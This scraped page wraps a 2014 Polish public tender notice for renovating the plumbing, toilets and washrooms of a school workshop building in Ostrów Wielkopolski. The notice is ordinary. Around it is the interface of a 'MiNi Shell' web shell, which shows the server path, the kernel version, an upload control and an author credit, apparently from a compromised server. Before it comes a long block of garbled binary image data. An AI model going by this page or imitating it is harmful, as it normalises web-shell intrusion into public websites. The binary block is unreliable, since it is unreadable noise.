JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140423/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140423/137048-N-2014.html

<p class="kh_header"><b>Ostrów Wielkopolski: Kapitalny remont instalacji wodociągowej i kanalizacyjnej oraz toalety i umywalni uczniów w budynku głównym warsztatów szkolnych przy ulicy Wolności 10.</b><br>
<b>Numer ogłoszenia: 137048 - 2014; data zamieszczenia: 23.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Transportowo-Elektrycznych CKU , ul. Kantaka 6, 63-400 Ostrów Wielkopolski, woj. wielkopolskie, tel. 062 7366709, faks 062 7366709.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zste.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kapitalny remont instalacji wodociągowej i kanalizacyjnej oraz toalety i umywalni uczniów w budynku głównym warsztatów szkolnych przy ulicy Wolności 10..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.    KAPITALNY  REMONT  INSTALACJI  WODOCIĄGOWEJ  I  KANALIZACYJNEJ  ORAZ  TOALETY  I  UMYWALNI  UCZNIÓW  W  BUDYNKU  GŁÓWNYM  WARSZTATÓW  SZKOLNYCH  PRZY  UL.  WOLNOŚCI  10.  -  ZAKRES  A  POMIESZCZENIA  1/5,  1/6,  1/3,  2,2,  0/2,  0/3.
       
       1.1    ROBOTY  PRZYGOTOWAWCZE
                1.1.1    Demontaż  armatury  sanitarnej  -  28  kpl.,
                1.1.2    Demontaz  rurociągów  zeliwnych  -  52,94  m,
                1.1.3    Demontaż  rurociągów  PCV  -  20,132  m,
                1.1.4    Demontaż  grzejników  -  2  kpl
                1.1.5    Rozebranie  ścianek  działowych  -  19,44  m2
                1.1.6    Odbicie  tynków  wewnętrznych  -  131,695  m2,
                1.1.7    Rozebranie  posadzek  lastrikowych  -  33,40  m2.

       1.2    ROBOTY  MURARSKIE
                1.2.1    Nadproża  prefabrykowane  stalowe  -  9,7  m,
                1.2.2    Ścianki  działowe  pełne  gr.  12,0  [cm]  -  9,019  m2,
                1.2.3    Komin  wentylacyjny  5 - kanałowy  -  24,59  m
 


       1.3    ROBOTY  TYNKARSKIE  I  GLAZURNICZE
                1.3.1    Tynki  cementowe  wewnętrzne  ścian  kat.  III  -  97,795  m2,
                1.3.2    Tynki  wewnętrzne  zwykłe sufitów  kat.  III  -  33,90  m2
                1.3.3    Glazura  ścienna  z  płytek  60 x 30  cm  na  kleju   -  70,31  m2.

       1.4    ROBOTY  MALARSKIE
                1.4.1    Malowanie  tynków  wewnętrznych  farbami  emulsyjnymi  -  64,436  m2.

       1.5    PODŁOGI
               1.5.1    Warstwa  wyrównawcza    systemowa  gr. 3  cm  -  33,90  m2
               1.5.2    Warstwa  spadkowa  systemowa  gr.  śr.  2,0  cm  -  23,30  m2
               1.5.3    Izolacja  p.wodna  podłogi  -  23,30  m2,
               1.5.4    Izolacja  p.wodna  ścian  -  19,182  m2,
               1.5.5    Glazura  podłogowa  z  płytek  60 x 60  cm  -  33,90  m2.

       1.6    STOLARKA  OKIENNO - DRZWIOWA
                1.6.1    Witryny  aluminiowe  O1,  O2,  O3  -  11,56  m2,
                1.6.2    Witryna  aluminiowa  W1  -  7,34  m2,
                1.6.3    Witryna  aluminiowa  W2  -  5,40  m2,
                1.6.4    Drzwi  aluminiowe  jednoskrzydłowe  D1  -  3,0  m2,
                1.6.5    Skrzydła  drzwiowe  z  płyty  sanitarnej  gr.  3  cm  -  16,12  [m2].

       1.7    INSTALACJA  WODOCIĄGOWA
                1.7.1    Bateria  umywalkowa  elektroniczna  -  4  szt,
                1.7.2    Armatura  spłukująca  miskę  ustępową  sterowana  pneumatycznie  -  4  kpl.,
                1.7.3    Pisuar  sterowany  tradycyjnie -  3  kpl.,
            
       1.8    INSTALACJA  KANALIZACYJNA
                1.8.1    Rurociągi  z  PCV  kanalizacyjne  o  dn.  160  mm  -  4,653  m,
                1.8.2    Rurociągi  z  PCV  kanalizacyjne  o  dn.  110  mm  -  9,16  m,
                1.8.3    Rurociągi  z  PCV  kanalizacyjne  o  dn.  110  mm -  20,88  m, 
                1.8.4    Oczko  ustęp  typu  typu  Geberit-  4  kpl.,
                1.8.5    Pisuar   -  3  kpl.,
                1.8.6    Umywalka  typu  Geberit 4  kpl.,
               
       1.9    INSTALACJA  CENTRALNEGO  OGRZEWANIA
                1.9.1     Grzejniki  stalowe  dwupłytowe  -  4  kpl.

       1.10  INSTALACJA  ELEKTRYCZNA
                1.10.1   Przewód  kabelkowy    5 x 16  mm2  -  18,0  m,
                1.10.2   Przewód  kabelkowy    5 x 2,5  mm2  -  30,072  m,
                1.10.2   Przewód wtynkowy - YDYt 700 V  3 X 1,5  mm2  -   165  m,
                1.10.3   Przewód wtynkowy - YDYt 700 V  3 X 2,5  mm2  -   42  m,   
                1.10.4   Rozdzielnia  elektryczna  R1  -  1  kpl.,
                1.10.5   Gniazda  wtykowe  EI44,  230  V -  2  szt.
                1.10.6   Oprawy  oświetleniowe  świetlówkowe  4 x 40  W EI44-  7  kpl.
                             
2.    KAPITALNY  REMONT  INSTALACJI  WODOCIĄGOWEJ  I  KANALIZACYJNEJ  ORAZ  TOALETY  I  UMYWALNI  UCZNIÓW  W  BUDYNKU  GŁÓWNYM  WARSZTATÓW  SZKOLNYCH  PRZY  UL.  WOLNOŚCI  10.  -  ZAKRES  B POMIESZCZENIA  1/7,   1/8,  1/9,  1/10,  0/5,  0/4,  0/1. 

       2.1    ROBOTY  PRZYGOTOWAWCZE
                2.1.1    Demontaż  armatury  sanitarnej  -  23  kpl.,
                2.1.2    Demontaż  rurociągów  żeliwnych  -  38  m,
                2.1.3    Demontaż  rurociągów  PCV  -  0  m,
                2.1.4    Demontaż  grzejników  -  2  kpl
                2.1.5    Rozebranie  ścianek  działowych  -  0  m2
                2.1.6    Odbicie  tynków  wewnętrznych  -  82,602  m2
                2.1.7    Rozebranie  posadzek  lastrikowych  -  26,5  m2.


       2.2    ROBOTY  MURARSKIE
                2.2.1    Ścianki  działowe  pełne  gr.  6,5  [cm]  -  0  m2,
                2.2.2    Ścianki  działowe  pełne  gr.  12,0  [cm]  -  0  m2,
                2.2.3    Komin  wentylacyjny  5 - kanałowy  -  0  m.
          
       2.3    ROBOTY  TYNKARSKIE  I  GLAZURNICZE
                2.3.1    Tynki  cementowe  wewnętrzne  ścian  kat.  III  -  56,102  m2,
                2.3.2    Tynki  wewnętrzne  zwykłe sufitów  kat.  III  -  26,50  m2,
                2.3.3    Glazura  ścienna  z  płytek  60 x 30  cm  na  kleju   -  17,937  m2.

       2.4    ROBOTY  MALARSKIE
                2.4.1    Malowanie  tynków  wewnętrznych  farbami  emulsyjnymi  -  167,906  m2.

       2.5    PODŁOGI
               2.5.1    Warstwa  wyrównawcza    systemowa  gr. 3  [cm]  -  26,50  [m2]
               2.5.2    Warstwa  spadkowa  systemowa  gr.  śr.  2,0  [cm]  -  26,50 [m2]
               2.5.3    Izolacja  p.wodna  podłogi  -  26,50 [m2],
               2.5.4    Izolacja  p.wodna  ścian  -  36,19  [m2],
               2.5.5    Glazura  podłogowa  z  płytek  60 x 60  [cm]  -  28,215  [m2].
       2.6    STOLARKA  OKIENNO - DRZWIOWA
                2.6.1    Witryny  aluminiowe  O1,  O2,  O3,  O4  -  0  [m2],
                2.6.2    Witryna  aluminowa  W1  -  0  [m2],
                2.6.3    Witryna  aluminiowa  W2  -  0  [m2],
                2.6.4    Drzwi  aluminiowe  jednoslrzydłowe  -  0 [m2],
                2.6.5    Skrzydła  drzwiowe  z  futryną -  2,05  [m2].
       2.7    INSTALACJA  WODOCIĄGOWA
                2.7.1    Bateria  umywalkowa  wbudowana  w   ścianę  z  przyciskiem  pneumatycznym 
                             -  8  [szt],
                2.7.2    Armatura  spłukująca  miskę  ustępową  sterowana  pneumatycznie  -  0 [kpl.],     
       2.8    INSTALACJA  KANALIZACYJNA
                2.8.1    Rurociągi  z  PCV  kanalizacyjne  o  dn.  160  [mm]  -  0  [m],
                2.8.2    Rurociągi  z  PCV  kanalizacyjne  o  dn.  110  [mm]  -  27,48  [m],
                2.8.3    Oczko  ustęp  typu  typu  Geberit-  0  [kpl.],
                2.8.4    Pisuar  t -  0  [kpl.],
                2.8.5    Umywalka  typu  Geberit 8  [kpl.]
       2.9    INSTALACJA  CENTRALNEGO  OGRZEWANIA
                2.9.1     Grzejniki  stalowe  dwupłytowe  -  4  [kpl.].
       2.10  INSTALACJA  ELEKTRYCZNA
                2.10.1   Przewód  kabelkowy    5 x 16  [mm2]  -  64,32  [m],
                2.10.2   Przewód  kabelkowy    5 x 2,5  [mm2]  -  185,0  [m],
                2.10.2   Przewód wtynkowy - YDYt 700 V  3 X 1,5  mm2  -   165  [m],
                2.10.3   Przewód wtynkowy - YDYt 700 V  3 X 2,5  mm2  -   32,0  [m],   
                2.10.4   Rozdzielnia  elektryczna  R1  -  1  kpl.,
                2.10.5   Gniazda  wtykowe  EI44,  230  [V]  -  2  [szt.]
                2.10.6   Oprawy  oświetleniowe  świetlówkowe  4 x 40  [W]  (EI44) -  7  [kpl.],

3.3.  Zakres robót do wykonania opisują następujące dokumenty: 
	a)	 przedmiar robót - załącznik nr 8, 
	b)	 inwentaryzacja rysunki od i1- i3, - załącznik nr 9, 
	c)	 projekt budowlany rysunki od 1-5, - załącznik nr 9,  
	d)	 projekt technologiczny rysunek od t-1 skala 1:50.- załącznik nr 9. 
	e) 	 STWiOR - załącznik nr 10.
 
UWAGA : Zakres robót nie obejmuje : 
a) pom.1/7 i 1/8 wg rys.nr i2 i 1/10 wg rys.nr 2
b) wyspy w pom.1/7 wg rys.nr 2..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.10.00-8, 45.43.12.00-9, 45.44.21.00-8, 45.42.11.00-5, 45.33.22.00-5, 45.33.23.00-6, 45.33.11.00-7, 45.31.12.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagane wadium w wysokości 2000,00 zł. słownie dwatysiącezłotych 00/100</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena na podstawie złożonego oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena na podstawie złożonego oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena na podstawie złożonego oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena na podstawie złożonego oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena na podstawie złożonego oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1,Formularz ofertowy 
2.Kosztorys ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany niniejszej umowy wymagają formy pisemnego aneksu pod rygorem nieważności i mogą zostać dokonane, o ile nie stoją w sprzeczności z regulacjami zawartymi w ustawie Prawo zamówień publicznych.
2.	Zmiany, o których mowa w ust. 3 mogą:
1)	dotyczyć przedłużenia terminów, o których mowa w § 2 ust. 1 w przypadku:
a)	konieczności wykonania robót nieprzewidzianych w dokumentacji, 
b)	konieczności wykonania zamówień/robót dodatkowych, których wykonanie jest niezbędne dla prawidłowego wykonania oraz zakończenia podstawowego przedmiotu zamówienia wraz ze wszystkimi konsekwencjami występującymi w związku z przedłużeniem tego terminu,
c)	zmian przepisów prawa Unii Europejskiej lub prawa krajowego, 
co powoduje konieczność dostosowania dokumentacji do zmiany przepisów, które nastąpiły w trakcie realizacji zamówienia,
d)	zmian będących następstwem działania organów administracji, tj. przekroczenia terminów określonych prawnie na wydanie przez organy administracji zezwoleń, decyzji czy odmowa ich wydania na skutek błędów w dokumentacji projektowej,
e)	opóźnień w uzyskaniu wymaganych pozwoleń, uzgodnień, decyzji lub opinii innych organów, niezbędnych do uzyskania pozwolenia na użytkowanie obiektu,
f)	zmian w dokumentacji projektowej dokonanej na wniosek wykonawcy lub zamawiającego, 
g)	konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót,
h)	pisemnego żądania wstrzymania robót skierowanego do wykonawcy przez zamawiającego, inspektora nadzoru inwestorskiego lub wydania zakazu prowadzenia prac przez organ administracji publicznej o ile żądanie lub wydanie zakazów nie nastąpiło z przyczyn, za które wykonawca ponosi odpowiedzialność,  
i)	wystąpienia odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w szczególności istnienia niezinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych,
j)	wystąpienia niekorzystnych warunków atmosferycznych powodujących wstrzymanie wykonania umowy, potwierdzonych pisemnie przez zamawiającego, przy czym przesunięcie terminu robót nastąpi o tyle dni, przez ile trwało ich wstrzymanie, o okres, w którym roboty będące przedmiotem umowy nie będą mogły być prowadzone,
2)	dotyczyć zmiany numeru rachunku bankowego lub zmiany innych danych wykonawcy,
3)	dotyczyć zmian sposobu finansowania inwestycji w przypadku zmiany wysokości środków finansowych przeznaczonych na realizację inwestycji na skutek zmian w budżecie. 
4)	być związane ze zmianą przepisów prawa powszechnie obowiązującego, jeśli wpływa ona na zakres lub warunki wykonania przez strony świadczeń wynikających
z umowy.
3.	Wystąpienie okoliczności, o których mowa w ust. 4 pkt 1, należy potwierdzić stosownymi wpisami do dziennika budowy, zaakceptowanymi przez inspektora nadzoru oraz niezwłocznie zgłosić pisemnie osobom, o których mowa w § 15 pkt 1.
4.	Ewentualne spory wynikłe na tle realizacji niniejszej umowy będą rozstrzygane przez Sądy Powszechne, właściwe miejscowo dla zamawiającego.
5.	Specyfikacja Istotnych Warunków Zamówienia w postępowaniu poprzedzającym zawarcie tej umowy stanowi jej integralną część.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> zste.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Transportowo Elektrycznych Centrum Kształcenia Ustawicznego ul.Kantaka 6 63-400 Ostrów Wielkopolski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.05.2014 godzina 11:00, miejsce: Zespoł Szkół Transportowo Elektrycznych Centrum Kształcenia Ustawicznego ul.Kantaka 6, 63-400 Ostrów Wielkopolski - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com